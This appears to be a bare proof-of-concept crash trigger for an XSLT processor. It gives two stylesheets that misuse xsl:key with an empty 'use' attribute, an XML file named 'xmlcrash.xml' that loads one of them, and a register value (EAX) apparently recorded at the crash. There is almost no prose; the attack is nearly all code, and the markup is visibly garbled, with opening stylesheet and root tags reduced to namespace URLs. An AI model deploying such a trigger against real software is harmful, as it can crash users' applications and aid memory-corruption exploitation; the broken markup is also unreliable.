<?xml version="1.0" encoding="UTF-8"?>

http://www.w3.org/1999/XSL/Transform">

    <xsl:key name="label" match="item1" use=""/>

    <xsl:template match="root">
                   <xsl:for-each select="key('label', @item1)">
                </xsl:for-each>
    </xsl:template>

</xsl:stylesheet>
xslt.xsl code EAX=017ED9A0:
<?xml version="1.0" encoding="UTF-8"?>

http://www.w3.org/1999/XSL/Transform">

    <xsl:key name="label" match="item1" use=""/>

    <xsl:template match="root">
                   <xsl:value-of select="key('label', @item1)">
                </xsl:value-of>
    </xsl:template>
</xsl:stylesheet>

xmlcrash.xml code:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="xslt.xsl"?>
http://www.w3.org/2001/XMLSchema-instance">
    <item1 id="datasniper" />
</root>
